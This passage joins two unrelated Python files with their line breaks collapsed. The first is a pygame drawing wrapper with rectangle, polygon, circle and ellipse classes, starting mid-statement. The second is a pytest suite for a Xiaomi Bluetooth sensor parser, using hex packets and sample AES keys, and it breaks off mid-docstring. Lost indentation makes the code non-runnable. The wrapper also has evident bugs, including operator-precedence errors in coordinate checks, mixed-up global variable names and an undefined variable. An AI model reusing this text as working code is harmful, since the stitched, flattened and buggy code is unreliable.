cor=='X' or cor=='x' and storona=='down':return self.screen.get_width() elif cor=='Y' or cor=='y' and storona=='up':return 0 elif cor=='Y' or cor=='y' and storona=='down':return self.screen.get_height() else: print(colorama.Fore.RED+'Error'+colorama.Fore.RESET) print(colorama.Fore.YELLOW+'None cordinate'+colorama.Fore.RESET) print(colorama.Fore.YELLOW+'Uses up or down'+colorama.Fore.RESET) sys.exit() def GET_FPS(self):return int(self.clock.get_fps()) def CLOSE(self,running=True,EXIT_BUTTON='esc'): for event in pygame.event.get(): if event.type == pygame.QUIT: running = False events = pygame.event.get() pygame_widgets.update(events) if keyboard.is_pressed(EXIT_BUTTON): sys.exit() return running def EXIT(self,EXIT_BUTTON='esc'): if keyboard.is_pressed(EXIT_BUTTON): sys.exit() def GET_WIN_SIZE(self): return self.screen.get_size() def GET_WIN_WIDTH(self): return self.screen.get_size()[0] def GET_WIN_HEIGHT(self): return self.screen.get_size()[1] def GET_EVENT(self): events = pygame.event.get() return events def FUNCTION(self,functions=[]): for i in range(len(functions)): functions[i]() def GET_GL_FUNCTIONS(self): print(colorama.Fore.GREEN+'GL_FUNCTIONS---') print(''' Draw f- D-none Obv f- O-(rrr)(ggg)(bbb)-THICKNESS DrOb f- OD-(rrr)(ggg)(bbb)-THICKNESS '''+colorama.Fore.RESET) def UPDATE_SCREEN(self): self.width = self.screen.get_width() self.height = self.screen.get_height() class UPDATE(): def __init__(self): pygame.display.flip() def GETTIME(self): global start_time start_time+=1 return start_time def SETBGCOLOR(self,col='white'): screen.fill(col) class GL: def __init__(self): pass class Rect: def __init__(self,COLOR=(),POSITION=[],SIZE=[],THICKNESS=0,SURF=None,FUNCTION='none'): sh2 = 1 center = [POSITION[0] + SIZE[0]/2,POSITION[1]+SIZE[1]/2] pos=[POSITION[0],POSITION[1]] up = [POSITION[0],POSITION[1]] down = [POSITION[0]+SIZE[1],POSITION[1]+SIZE[0]] right = [POSITION[0]+SIZE[1],POSITION[1]+SIZE[0]] left = [POSITION[0],POSITION[1]] self.pos = pos self.size = SIZE if SURF=='s' and type(SURF)==str:self.surf = screen else:self.surf = SURF self.col = COLOR self.obv_color = 'black' self.sh = THICKNESS self.sh2 = sh2 self.center = center self.up = up self.down = down self.left = left self.right = right self.DL_diagonal = math.sqrt(SIZE[0]**2+SIZE[1]**2) if FUNCTION=='D': rect = pygame.Rect(self.pos[0],self.pos[1],self.size[0],self.size[1]) pygame.draw.rect(self.surf,self.col,rect,self.sh) elif FUNCTION[1]=='D': col = [int(FUNCTION[3:6]),int(FUNCTION[7:10]),int(FUNCTION[11:14])] sh2 = int(FUNCTION[15:len(FUNCTION)]) if col!=None:self.obv_color = col if sh2!=None:self.sh2 = sh2 rect = pygame.Rect(self.pos[0],self.pos[1],self.size[0],self.size[1]) pygame.draw.rect(self.surf,self.col,rect,self.sh) pygame.draw.rect(self.surf,self.obv_color,rect,self.sh2) elif FUNCTION[0]=='O': col = [int(FUNCTION[2:5]),int(FUNCTION[6:9]),int(FUNCTION[10:13])] sh2 = int(FUNCTION[14:len(FUNCTION)]) if col!=[0,0,0]:self.obv_color = col if sh2!=None:self.sh2 = sh2 rect = pygame.Rect(self.pos[0],self.pos[1],self.size[0],self.size[1]) pygame.draw.rect(self.surf,self.obv_color,rect,self.sh2) else: pass def FILL(self): rect = pygame.Rect(self.pos[0],self.pos[1],self.size[0],self.size[1]) pygame.draw.rect(self.surf,self.col,rect,self.sh) def FILLOUT(self,COLOR=None,THICKNESS=None): if COLOR!=None:self.obv_color = COLOR if THICKNESS!=None:self.sh2 = THICKNESS rect = pygame.Rect(self.pos[0],self.pos[1],self.size[0],self.size[1]) pygame.draw.rect(self.surf,self.col,rect,self.sh) pygame.draw.rect(self.surf,self.obv_color,rect,self.sh2) def OUTLINE(self,COLOR=None,THICKNESS=None): if COLOR!=None:self.obv_color = COLOR if THICKNESS!=None:self.sh2 = THICKNESS rect = pygame.Rect(self.pos[0],self.pos[1],self.size[0],self.size[1]) pygame.draw.rect(self.surf,self.obv_color,rect,self.sh2) def SET_SIZE(self,SIZE=[]): self.size = SIZE def SET_THICKNESS(self,THICKNESS): self.sh = THICKNESS def SET_COLOR(self,COLOR=()): self.col = COLOR def GET_SIZE(self): return self.size def GET_THICKNESS(self): return self.sh def SET_OUTLINE_THICKNESS(self,THICKNESS): self.sh2=THICKNESS def GET_CENTER(self): return self.center def GET_SURF(self): return self.surf def GET_OUTLINE_THICKNESS(self): return self.sh2 def SET_POSITION(self,POSITION): self.pos = POSITION up = [self.pos[0],self.pos[1]] down = [self.pos[0]+self.size[1],self.pos[1]+self.size[0]] right = [self.pos[0]+self.size[1],self.pos[1]+self.size[0]] left = [self.pos[0],self.pos[1]] self.up = up self.down = down self.left = left self.right = right def GET_POSITION(self): return self.pos class Poligon: def __init__(self,COLOR=(),POINTS=(),THICKNESS=0,SURF=None,FUNCTION='none'): self.points = POINTS self.col = COLOR self.sh = THICKNESS self.sh2 = 1 if SURF=='s' and type(SURF)==str:self.surf=screen else:self.surf = SURF self.obv_col = 'black' if FUNCTION=='D': pygame.draw.polygon(self.surf,self.col,self.points,self.sh) elif FUNCTION[1]=='D': COLOR = [int(FUNCTION[3:6]),int(FUNCTION[7:10]),int(FUNCTION[11:14])] THICKNESS = int(FUNCTION[15:len(FUNCTION)]) pygame.draw.polygon(self.surf,self.col,self.points,self.sh) if COLOR!=None:self.obv_col = COLOR if THICKNESS!=None:self.sh2 = THICKNESS pygame.draw.polygon(self.surf,self.obv_col,self.points,self.sh2) elif FUNCTION[0]=='O': COLOR = [int(FUNCTION[2:5]),int(FUNCTION[6:9]),int(FUNCTION[10:13])] THICKNESS = int(FUNCTION[14:len(FUNCTION)]) if COLOR!=None:self.obv_col = COLOR if THICKNESS!=None:self.sh2 = THICKNESS pygame.draw.polygon(self.surf,self.obv_col,self.points,self.sh2) else: pass def FILL(self): pygame.draw.polygon(self.surf,self.col,self.points,self.sh) def OUTLINE(self,COLOR=None,THICKNESS=None): if COLOR!=None:self.obv_col = COLOR if THICKNESS!=None:self.sh2 = THICKNESS pygame.draw.polygon(self.surf,self.obv_col,self.points,self.sh2) def FILLOUT(self,COLOR=None,THICKNESS=None): pygame.draw.polygon(self.surf,self.col,self.points,self.sh) if COLOR!=None:self.obv_col = COLOR if THICKNESS!=None:self.sh2 = THICKNESS pygame.draw.polygon(self.surf,self.obv_col,self.points,self.sh2) def GET_POINTS(self): return self.points def GET_COLOR(self): return self.col def GET_OUTLINE_COLOR(self): return self.obv_col def GET_THICKNESS(self): return self.sh def GET_OUTLINE_THICKNESS(self): return self.sh2 def GET_SURF(self): return self.surf def SET_THICKNESS(self,THICKNESS): self.sh = THICKNESS def SET_OUTLINE_THICKNESS(self,THICKNESS): self.sh2 = THICKNESS def SET_OUTLINE_COLOR(self,COLOR=()): self.obv_col = COLOR def SET_COLOR(self,COLOR=()): self.col = COLOR class Circle: def __init__(self,COLOR=(),POSITION=[],RADIUS=0,THICKNESS=0,SURF=0,FUNCTION='none'): global g_c_pos , g_c_rad center = [POSITION[0],POSITION[1]] sh2 = 1 self.sh2 = sh2 self.col = COLOR self.sh = THICKNESS self.rad = RADIUS ; g_c_rad = self.rad self.obv_col = (0,0,0) if SURF=='s' and type(SURF)==str:self.surf=screen else:self.surf = SURF self.center = center self.pos = POSITION ; g_e_pos = self.pos up_cic = [POSITION[0],POSITION[1]-self.rad] ; self.up = up_cic down_cic = [POSITION[0],POSITION[1]+self.rad] ; self.down = down_cic left_cic = [POSITION[0]-self.rad,POSITION[1]] ; self.left = left_cic right_cic = [POSITION[0]+self.rad,POSITION[1]] ; self.right = right_cic if FUNCTION=='D': pygame.draw.circle(self.surf,self.col,(self.pos[0],self.pos[1]),self.rad,self.sh) elif FUNCTION[1]=='D': COLOR = [int(FUNCTION[3:6]),int(FUNCTION[7:10]),int(FUNCTION[11:14])] THICKNESS = int(FUNCTION[15:len(FUNCTION)]) pygame.draw.circle(self.surf,self.col,(self.pos[0],self.pos[1]),self.rad,self.sh) if COLOR!=None:self.obv_col = COLOR if THICKNESS!=None:self.sh2 = THICKNESS pygame.draw.circle(self.surf,COLOR,(self.pos[0],self.pos[1]),self.rad,self.sh2) elif FUNCTION[0]=='O': COLOR = [int(FUNCTION[2:5]),int(FUNCTION[6:9]),int(FUNCTION[10:13])] THICKNESS = int(FUNCTION[14:len(FUNCTION)]) if COLOR!=None:self.obv_col = COLOR if THICKNESS!=None:self.sh2 = THICKNESS pygame.draw.circle(self.surf,COLOR,(self.pos[0],self.pos[1]),self.rad,self.sh2) else: pass def FILL(self): global g_c_pos if g_c_pos!=None:self.pos = g_c_pos pygame.draw.circle(self.surf,self.col,(self.pos[0],self.pos[1]),self.rad,self.sh) def OUTLINE(self,COLOR=None,THICKNESS=None): global g_c_pos if g_c_pos!=None:self.pos = g_c_pos if COLOR!=None:self.obv_col = COLOR if THICKNESS!=None:self.sh2 = THICKNESS pygame.draw.circle(self.surf,self.obv_col,(self.pos[0],self.pos[1]),self.rad,self.sh2) def FILLOUT(self,COLOR=None,THICKNESS=None): global g_c_pos if g_c_pos!=None:self.pos = g_c_pos pygame.draw.circle(self.surf,self.col,(self.pos[0],self.pos[1]),self.rad,self.sh) if COLOR!=None:self.obv_col = COLOR if THICKNESS!=None:self.sh2 = THICKNESS pygame.draw.circle(self.surf,self.obv_col,(self.pos[0],self.pos[1]),self.rad,self.sh2) def SET_RADIUS(self,RADIUS): self.rad = RADIUS def SET_COLOR(self,COLOR=()): self.col = COLOR def GET_RADIUS(self): return self.rad def GET_THICKNESS(self): return self.sh def GET_CENTER(self): return self.center def GET_SURF(self): return self.surf def SET_OUTLINE_THICKNESS(self,sh2): self.sh2 = sh2 def SET_THICKNESS(self,THICKNESS): self.sh=THICKNESS def GET_OUTLINE_THICKNESS(self): return self.sh2 class SET_POSITION(): def __init__(self,POSITION=[]): global g_c_rad , g_c_pos self.POSITION = POSITION g_c_pos = [POSITION[0]+g_c_rad, POSITION[1]+g_c_rad] up_cic = [POSITION[0],POSITION[1]-g_c_rad] down_cic = [POSITION[0],POSITION[1]+g_c_rad] left_cic = [POSITION[0]-g_c_rad,POSITION[1]] right_cic = [POSITION[0]+g_c_rad,POSITION[1]] self.up = up_cic self.down = down_cic self.left = left_cic self.right = right_cic def ON_CENTER(self): global g_c_rad , g_c_pos POSITION = self.POSITION g_c_pos = POSITION up_cic = [POSITION[0],POSITION[1]-g_c_rad] down_cic = [POSITION[0],POSITION[1]+g_c_rad] left_cic = [POSITION[0]-g_c_rad,POSITION[1]] right_cic = [POSITION[0]+g_c_rad,POSITION[1]] self.up = up_cic self.down = down_cic self.left = left_cic self.right = right_cic def GET_POSITION(self): return self.pos class Ellips: def __init__(self,COLOR=(),POSITION=[],SIZE=[],THICKNESS=0,SURF=0,FUNCTION='none'): global g_e_size , g_e_pos center = [POSITION[0] + SIZE[0]/2,POSITION[1] + SIZE[1]/2] self.sh2 = 1 self.sh = THICKNESS self.center = center self.size = SIZE ; g_e_size = self.size self.col = COLOR self.obv_color = 'black' self.pos = POSITION ; g_e_pos = self.pos if SURF=='s' and type(SURF)==str:self.surf=screen else:self.surf = SURF el_up = [POSITION[0]+SIZE[0]/2,POSITION[1]] ; self.up = el_up el_down = [POSITION[0]+SIZE[0]/2,POSITION[1]+SIZE[1]] ; self.down = el_down el_left = [POSITION[0],POSITION[1]+SIZE[1]/2] ; self.left = el_left el_right = [POSITION[0]+SIZE[0],POSITION[1]+SIZE[1]/2] ; self.right = el_right if FUNCTION=='D': if g_pos!=None:self.pos = g_pos rect = pygame.Rect(self.pos[0],self.pos[1],self.size[0],self.size[1]) pygame.draw.ellipse(self.surf,self.col,rect,self.sh) elif FUNCTION[1]=='D': COLOR = [int(FUNCTION[3:6]),int(FUNCTION[7:10]),int(FUNCTION[11:14])] THICKNESS = int(FUNCTION[15:len(FUNCTION)]) if g_pos!=None:self.pos = g_pos rect = pygame.Rect(self.pos[0],self.pos[1],self.size[0],self.size[1]) pygame.draw.ellipse(self.surf,self.col,rect,self.sh) if COLOR!=None:self.obv_color = COLOR if THICKNESS!=None:self.sh2 = THICKNESS rect = pygame.Rect(self.pos[0],self.pos[1],self.size[0],self.size[1]) pygame.draw.ellipse(self.surf,self.obv_color,rect,self.sh2) elif FUNCTION[0]=='O': COLOR = [int(FUNCTION[2:5]),int(FUNCTION[6:9]),int(FUNCTION[10:13])] THICKNESS = int(FUNCTION[14:len(FUNCTION)]) if COLOR!=None:self.obv_color = COLOR if THICKNESS!=None:self.sh2 = THICKNESS if g_pos!=None:self.pos = g_pos rect = pygame.Rect(self.pos[0],self.pos[1],self.size[0],self.size[1]) pygame.draw.ellipse(self.surf,self.obv_color,rect,self.sh2) else: pass def FILL(self): global g_e_pos if g_e_pos!=None:self.pos = g_e_pos rect = pygame.Rect(self.pos[0],self.pos[1],self.size[0],self.size[1]) pygame.draw.ellipse(self.surf,self.col,rect,self.sh) def OUTLINE(self,COLOR=None,THICKNESS=None): global g_e_pos if COLOR!=None:self.obv_color = COLOR if THICKNESS!=None:self.sh2 = THICKNESS if g_e_pos!=None:self.pos = g_e_pos rect = pygame.Rect(self.pos[0],self.pos[1],self.size[0],self.size[1]) pygame.draw.ellipse(self.surf,self.obv_color,rect,self.sh2) def FILLOUT(self,COLOR=None,THICKNESS=None): global g_e_pos if g_e_pos!=None:self.pos = g_e_pos rect = pygame.Rect(self.pos[0],self.pos[1],self.size[0],self.size[1]) pygame.draw.ellipse(self.surf,self.col,rect,self.sh) if COLOR!=None:self.obv_color = COLOR if THICKNESS!=None:self.sh2 = THICKNESS rect = pygame.Rect(self.pos[0],self.pos[1],self.size[0],self.size[1]) pygame.draw.ellipse(self.surf,self.obv_color,rect,self.sh2) def SET_SIZE(self,SIZE=[]): self.size = SIZE def GET_CENTER(self): return self.center def GET_THICKNESS(self): return self.sh def GET_SURF(self): return self.surf def SET_COLOR(self,COLOR=()): self.col = COLOR def GET_SIZE(self): return self.size def GET_OUTLINE_THICKNESS(self): return self.sh2 def SET_OUTLINE_THICKNESS(self,OUTLINE_THICKNESS): self.sh2 = OUTLINE_THICKNESS def SET_THICKNESS(self,THICKNESS): self.sh = THICKNESS class SET_POSITION(): def __init__(self,POSITION=[]): global g_e_pos , g_e_size self.POSITION = POSITION g_e_pos = POSITION el_up = [POSITION[0]+g_e_size[0]/2,POSITION[1]] el_down = [POSITION[0]+g_e_size[0]/2,POSITION[1]+g_e_size[1]] el_left = [POSITION[0],POSITION[1]+g_e_size[1]/2] el_right = [POSITION[0]+g_e_size[0],POSITION[1]+g_e_size[1]/2] self.up = el_up self.down = el_down self.left = el_left self.right = el_right def ON_CENTER(self): global g_pos POSITION = self.POSITION g_e_pos = [POSITION[0]-g_e_size[0]/2,POSITION[1]-g_e_size[1]/2] el_up = [POSITION[0]+g_e_size[0]/2,POSITION[1]] el_down = [POSITION[0]+g_e_size[0]/2,POSITION[1]+g_e_size[1]] el_left = [POSITION[0],POSITION[1]+g_e_size[1]/2] el_right = [POSITION[0]+g_e_size[0],POSITION[1]+g_e_size[1]/2] self.up = el_up self.down = el_down self.left = el_left self.right = el_right
"""The tests for the Xiaomi ble_parser.""" from ble_monitor.ble_parser import BleParser class TestXiaomi: def test_Xiaomi_LYWSDCGQ(self): """Test Xiaomi parser for LYWSDCGQ.""" data_string = "043e2502010000219335342d5819020106151695fe5020aa01da219335342d580d1004fe004802c4" data = bytes(bytearray.fromhex(data_string)) # pylint: disable=unused-variable ble_parser = BleParser() sensor_msg, tracker_msg = ble_parser.parse_data(data) assert sensor_msg["firmware"] == "Xiaomi (MiBeacon V2)" assert sensor_msg["type"] == "LYWSDCGQ" assert sensor_msg["mac"] == "582D34359321" assert sensor_msg["packet"] == 218 assert sensor_msg["data"] assert sensor_msg["temperature"] == 25.4 assert sensor_msg["humidity"] == 58.4 assert sensor_msg["rssi"] == -60 def test_Xiaomi_CGG1(self): """Test Xiaomi parser for CGG1.""" data_string = "043e2a020100005f12342d585a1e0201061a1695fe5858480b685f12342d585a0b1841e2aa000e00a4964fb5b6" data = bytes(bytearray.fromhex(data_string)) aeskey = "<KEY>" self.aeskeys = {} p_mac = bytes.fromhex("5A582D34125F") p_key = bytes.fromhex(aeskey.lower()) self.aeskeys[p_mac] = p_key allow_list = self.aeskeys.keys() # pylint: disable=unused-variable ble_parser = BleParser(aeskeys=self.aeskeys, discovery=False, sensor_whitelist=allow_list) sensor_msg, tracker_msg = ble_parser.parse_data(data) assert sensor_msg["firmware"] == "Xiaomi (MiBeacon V5 encrypted)" assert sensor_msg["type"] == "CGG1-ENCRYPTED" assert sensor_msg["mac"] == "5A582D34125F" assert sensor_msg["packet"] == 104 assert sensor_msg["data"] assert sensor_msg["humidity"] == 59.6 assert sensor_msg["rssi"] == -74 def test_Xiaomi_CGDK2(self): """Test Xiaomi parser for CGDK2.""" data_string = "043e2a02010000892012342d581e0201061a1695fe58586f0607892012342d585f176dd54f0200002fa453faaf" data = bytes(bytearray.fromhex(data_string)) aeskey = "a3bfe9853dd85a620debe3620caaa351" self.aeskeys = {} is_ext_packet = True if data[3] == 0x0D else False mac = (data[8 if is_ext_packet else 7:14 if is_ext_packet else 13])[::-1] mac_address = mac.hex() p_mac = bytes.fromhex(mac_address.replace(":", "").lower()) p_key = bytes.fromhex(aeskey.lower()) self.aeskeys[p_mac] = p_key # pylint: disable=unused-variable ble_parser = BleParser(aeskeys=self.aeskeys) sensor_msg, tracker_msg = ble_parser.parse_data(data) assert sensor_msg["firmware"] == "Xiaomi (MiBeacon V5 encrypted)" assert sensor_msg["type"] == "CGDK2" assert sensor_msg["mac"] == "582D34122089" assert sensor_msg["packet"] == 7 assert sensor_msg["data"] assert sensor_msg["temperature"] == 22.6 assert sensor_msg["rssi"] == -81 def test_Xiaomi_LYWSD02(self): """Test Xiaomi parser for LYWSD02.""" def test_Xiaomi_LYWSD03MMC(self): """Test Xiaomi parser for LYWSD03MMC without encryption.""" data_string = "043e22020100004c94b438c1a416151695fe50305b05034c94b438c1a40d10041001ea01cf" data = bytes(bytearray.fromhex(data_string)) # pylint: disable=unused-variable ble_parser = BleParser() sensor_msg, tracker_msg = ble_parser.parse_data(data) assert sensor_msg["firmware"] == "Xiaomi (MiBeacon V3)" assert sensor_msg["type"] == "LYWSD03MMC" assert sensor_msg["mac"] == "A4C138B4944C" assert sensor_msg["packet"] == 3 assert sensor_msg["data"] assert sensor_msg["temperature"] == 27.2 assert sensor_msg["humidity"] == 49.0 assert sensor_msg["rssi"] == -49 def test_Xiaomi_LYWSD03MMC_encrypted(self): """Test Xiaomi parser for LYWSD03MMC with encryption.""" data_string = "043e2a02010000f4830238c1a41e0201061a1695fe58585b0550f4830238c1a495ef58763c26000097e2abb5e2" data = bytes(bytearray.fromhex(data_string)) aeskey = "e9ea895fac7cca6d30532432a516f3a8" self.aeskeys = {} is_ext_packet = True if data[3] == 0x0D else False mac = (data[8 if is_ext_packet else 7:14 if is_ext_packet else 13])[::-1] mac_address = mac.hex() p_mac = bytes.fromhex(mac_address.replace(":", "").lower()) p_key = bytes.fromhex(aeskey.lower()) self.aeskeys[p_mac] = p_key # pylint: disable=unused-variable ble_parser = BleParser(aeskeys=self.aeskeys) sensor_msg, tracker_msg = ble_parser.parse_data(data) assert sensor_msg["firmware"] == "Xiaomi (MiBeacon V5 encrypted)" assert sensor_msg["type"] == "LYWSD03MMC" assert sensor_msg["mac"] == "A4C1380283F4" assert sensor_msg["packet"] == 80 assert sensor_msg["data"] assert sensor_msg["humidity"] == 46.7 assert sensor_msg["rssi"] == -30 def test_Xiaomi_CGC1(self): """Test Xiaomi parser for CGC1.""" def test_Xiaomi_CGD1(self): """Test Xiaomi parser for CGD1.""" def test_Xiaomi_CGP1W(self): """Test Xiaomi parser for CGP1W.""" def test_Xiaomi_MHO_C303(self): """Test Xiaomi parser for MHO-C303.""" def test_Xiaomi_MHO_C401(self): """Test Xiaomi parser for MHO-C401.""" def test_Xiaomi_JQJCY01YM1(self): """Test Xiaomi parser for JQJCY01YM.""" def test_Xiaomi_JTYJGD03MI_smoke(self): """Test Xiaomi parser for JTYJGD03MI.""" data_string = "043e2902010000bc9ce344ef541d020106191695fe5859970966bc9ce344ef5401081205000000715ebe90cb" data = bytes(bytearray.fromhex(data_string)) aeskey = "5b51a7c91cde6707c9ef18dfda143a58" self.aeskeys = {} is_ext_packet = True if data[3] == 0x0D else False mac = (data[8 if is_ext_packet else 7:14 if is_ext_packet else 13])[::-1] mac_address = mac.hex() p_mac = bytes.fromhex(mac_address.replace(":", "").lower()) p_key = bytes.fromhex(aeskey.lower()) self.aeskeys[p_mac] = p_key # pylint: disable=unused-variable ble_parser = BleParser(aeskeys=self.aeskeys) sensor_msg, tracker_msg = ble_parser.parse_data(data) assert sensor_msg["firmware"] == "Xiaomi (MiBeacon V5 encrypted)" assert sensor_msg["type"] == "JTYJGD03MI" assert sensor_msg["mac"] == "54EF44E39CBC" assert sensor_msg["packet"] == 102 assert sensor_msg["data"] assert sensor_msg["smoke detector"] == 1 assert sensor_msg["rssi"] == -53 def test_Xiaomi_JTYJGD03MI_press(self): """Test Xiaomi parser for JTYJGD03MI.""" data_string = "043e2b02010000bc9ce344ef541f0201061b1695fe5859970964bc9ce344ef5422206088fd000000003a148fb3cb" data = bytes(bytearray.fromhex(data_string)) aeskey = "5b51a7c91cde6707c9ef18dfda143a58" self.aeskeys = {} is_ext_packet = True if data[3] == 0x0D else False mac = (data[8 if is_ext_packet else 7:14 if is_ext_packet else 13])[::-1] mac_address = mac.hex() p_mac = bytes.fromhex(mac_address.replace(":", "").lower()) p_key = bytes.fromhex(aeskey.lower()) self.aeskeys[p_mac] = p_key # pylint: disable=unused-variable ble_parser = BleParser(aeskeys=self.aeskeys) sensor_msg, tracker_msg = ble_parser.parse_data(data) assert sensor_msg["firmware"] == "Xiaomi (MiBeacon V5 encrypted)" assert sensor_msg["type"] == "JTYJGD03MI" assert sensor_msg["mac"] == "54EF44E39CBC" assert sensor_msg["packet"] == 100 assert sensor_msg["data"] assert sensor_msg["button"] == "single press" assert sensor_msg["rssi"] == -53 def test_Xiaomi_HHCCJCY01(self): """Test Xiaomi parser for HHCCJCY01.""" data_string = "043e2802010000f34f6b8d7cc41c020106030295fe141695fe7120980012f34f6b8d7cc40d041002c400a9" data = bytes(bytearray.fromhex(data_string)) # pylint: disable=unused-variable ble_parser = BleParser() sensor_msg, tracker_msg = ble_parser.parse_data(data) assert sensor_msg["firmware"] == "Xiaomi (MiBeacon V2)" assert sensor_msg["type"] == "HHCCJCY01" assert sensor_msg["mac"] == "C47C8D6B4FF3" assert sensor_msg["packet"] == 18 assert sensor_msg["temperature"] == 19.6 assert sensor_msg["data"] assert sensor_msg["rssi"] == -87 def test_Xiaomi_GCLS002(self): """Test Xiaomi parser for GCLS002 / HHCCJCY09.""" data_string = "043E28020100003E596D8D7CC41C020106030295FE141695FE7120BC03CD3E596D8D7CC40D0410023C01A8" data = bytes(bytearray.fromhex(data_string)) # pylint: disable=unused-variable ble_parser = BleParser() sensor_msg, tracker_msg = ble_parser.parse_data(data) assert sensor_msg["firmware"] == "Xiaomi (MiBeacon V2)" assert sensor_msg["type"] == "GCLS002" assert sensor_msg["mac"] == "C47C8D6D593E" assert sensor_msg["packet"] == 205 assert sensor_msg["temperature"] == 31.6 assert sensor_msg["data"] assert sensor_msg["rssi"] == -88 def test_Xiaomi_HHCCPOT002(self): """Test Xiaomi parser for HHCCPOT002.""" def test_Xiaomi_WX08ZM(self): """Test Xiaomi parser for WX08ZM.""" def test_Xiaomi_MCCGQ02HL(self): """Test Xiaomi parser for MCCGQ02HL.""" def test_Xiaomi_CGH1(self): """Test Xiaomi parser for CGH1.""" def test_Xiaomi_YM_K1501(self): """Test Xiaomi parser for YM-K1501.""" def test_Xiaomi_V_SK152(self): """Test Xiaomi parser for V-SK152.""" def test_Xiaomi_SJWS01LM(self): """Test Xiaomi parser for SJWS01LM.""" def test_Xiaomi_MJYD02YL(self): """Test Xiaomi parser for MJYD02YL.""" def test_Xiaomi_MUE4094RT(self): """Test Xiaomi parser for MUE4094RT.""" data_string = "043e1c020102010c39b2e870de100201060c1695fe4030dd032403000101c6" data = bytes(bytearray.fromhex(data_string)) # pylint: disable=unused-variable ble_parser = BleParser() sensor_msg, tracker_msg = ble_parser.parse_data(data) assert sensor_msg["firmware"] == "Xiaomi (MiBeacon V3)" assert sensor_msg["type"] == "MUE4094RT" assert sensor_msg["mac"] == "DE70E8B2390C" assert sensor_msg["packet"] == 36 assert sensor_msg["data"] assert sensor_msg["motion"] == 1 assert sensor_msg["motion timer"] == 1 assert sensor_msg["rssi"] == -58 def test_Xiaomi_RTCGQ02LM(self): """Test Xiaomi parser for RTCGQ02LM with wrong encryption key.""" data_string = "043e2b020103000fc4e044ef541f0201061b1695fe58598d0a170fc4e044ef547cc27a5c03a1000000790df258bb" data = bytes(bytearray.fromhex(data_string)) aeskey = "FFD8CE9C08AE7533A79BDAF0BB755E96" self.aeskeys = {} is_ext_packet = True if data[3] == 0x0D else False mac = (data[8 if is_ext_packet else 7:14 if is_ext_packet else 13])[::-1] mac_address = mac.hex() p_mac = bytes.fromhex(mac_address.replace(":", "").lower()) p_key = bytes.fromhex(aeskey.lower()) self.aeskeys[p_mac] = p_key # pylint: disable=unused-variable ble_parser = BleParser(aeskeys=self.aeskeys) sensor_msg, tracker_msg = ble_parser.parse_data(data) assert sensor_msg["firmware"] == "Xiaomi (MiBeacon V5 encrypted)" assert sensor_msg["type"] == "RTCGQ02LM" assert sensor_msg["mac"] == "54EF44E0C40F" assert sensor_msg["packet"] == 23 assert sensor_msg["data"] is False assert sensor_msg["rssi"] == -69 def test_Xiaomi_CGPR1(self): """Test Xiaomi parser for CGPR1.""" def test_Xiaomi_MMC_T201_1(self): """Test Xiaomi parser for MMC-T201-1.""" data_string = "043e2b02010000c16fddf981001f02010603020918171695fe7022db006fc16fddf9810009002005c60d630d51b1" data = bytes(bytearray.fromhex(data_string)) # pylint: disable=unused-variable ble_parser = BleParser() sensor_msg, tracker_msg = ble_parser.parse_data(data) assert sensor_msg["firmware"] == "Xiaomi (MiBeacon V2)" assert sensor_msg["type"] == "MMC-T201-1" assert sensor_msg["mac"] == "0081F9DD6FC1" assert sensor_msg["packet"] == 111 assert sensor_msg["data"] assert sensor_msg["temperature"] == 36.87199806168224 assert sensor_msg["battery"] == 81 assert sensor_msg["rssi"] == -79 def test_Xiaomi_M1S_T500(self): """Test Xiaomi parser for M1S-T500.""" data_string = "043e2402010001115b174371e618020106141695fe7130890437115b174371e6091000020003dc" data = bytes(bytearray.fromhex(data_string)) # pylint: disable=unused-variable ble_parser = BleParser() sensor_msg, tracker_msg = ble_parser.parse_data(data) assert sensor_msg["firmware"] == "Xiaomi (MiBeacon V3)" assert sensor_msg["type"] == "M1S-T500" assert sensor_msg["mac"] == "E67143175B11" assert sensor_msg["packet"] == 55 assert sensor_msg["data"] assert sensor_msg["toothbrush"] == 1 assert sensor_msg["counter"] == 3 assert sensor_msg["rssi"] == -36 def test_Xiaomi_ZNMS16LM_fingerprint(self): """Test Xiaomi parser for ZNMS16LM.""" data_string = "043e2a02010000918aeb441fd71e020106030295fe161695fe50449e0642918aeb441fd7060005ffffffff00a9" data = bytes(bytearray.fromhex(data_string)) # pylint: disable=unused-variable ble_parser = BleParser() sensor_msg, tracker_msg = ble_parser.parse_data(data) assert sensor_msg["firmware"] == "Xiaomi (MiBeacon V4)" assert sensor_msg["type"] == "ZNMS16LM" assert sensor_msg["mac"] == "D71F44EB8A91" assert sensor_msg["packet"] == 66 assert sensor_msg["data"] assert sensor_msg["fingerprint"] == 1 assert sensor_msg["result"] == "match successful" assert sensor_msg["key id"] == "unknown operator" assert sensor_msg["rssi"] == -87 def test_Xiaomi_ZNMS16LM_lock(self): """Test Xiaomi parser for ZNMS16LM.""" data_string = "043e2e02010000918aeb441fd722020106030295fe1a1695fe50449e0643918aeb441fd70b000920020001807c442f61a9" data = bytes(bytearray.fromhex(data_string)) # pylint: disable=unused-variable ble_parser = BleParser() sensor_msg, tracker_msg = ble_parser.parse_data(data) assert sensor_msg["firmware"] == "Xiaomi (MiBeacon V4)" assert sensor_msg["type"] == "ZNMS16LM" assert sensor_msg["mac"] == "D71F44EB8A91" assert sensor_msg["packet"] == 67 assert sensor_msg["data"] assert sensor_msg["lock"] == 0 assert sensor_msg["action"] == "unlock outside the door" assert sensor_msg["method"] == "biometrics" assert sensor_msg["error"] is None assert sensor_msg["key id"] == 2 assert sensor_msg["rssi"] == -87 def test_Xiaomi_YLAI003(self): """Test Xiaomi parser for YLAI003.""" def test_Xiaomi_YLYK01YL(self): """Test Xiaomi parser for YLYK01YL.""" data_string = "043E21020103007450E94124F815141695FE503053013F7450E94124F8011003000000E0" data = bytes(bytearray.fromhex(data_string)) # pylint: disable=unused-variable ble_parser = BleParser() sensor_msg, tracker_msg = ble_parser.parse_data(data) assert sensor_msg["firmware"] == "Xiaomi (MiBeacon V3)" assert sensor_msg["type"] == "YLYK01YL" assert sensor_msg["mac"] == "F82441E95074" assert sensor_msg["packet"] == 63 assert sensor_msg["data"] assert sensor_msg["remote"] == "on" assert sensor_msg["button"] == "single press" assert sensor_msg["remote single press"] == 1 assert sensor_msg["rssi"] == -32 def test_Xiaomi_YLYK01YL_FANCL(self): """Test Xiaomi parser for YLYK01YL-FANCL.""" def test_Xiaomi_YLYK01YL_VENFAN(self): """Test Xiaomi parser for YLYK01YL-VENFAN.""" def test_Xiaomi_YLYB01YL_BHFRC(self): """Test Xiaomi parser for YLYB01YL-BHFRC.""" def test_Xiaomi_YLKG07YL_press(self): """Test Xiaomi parser for YLKG07YL, YLKG08YL while pressing dimmer (no 